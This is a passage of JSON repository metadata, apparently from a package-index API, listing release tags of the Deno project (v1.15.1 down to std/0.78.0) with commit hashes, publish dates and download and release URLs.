1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","down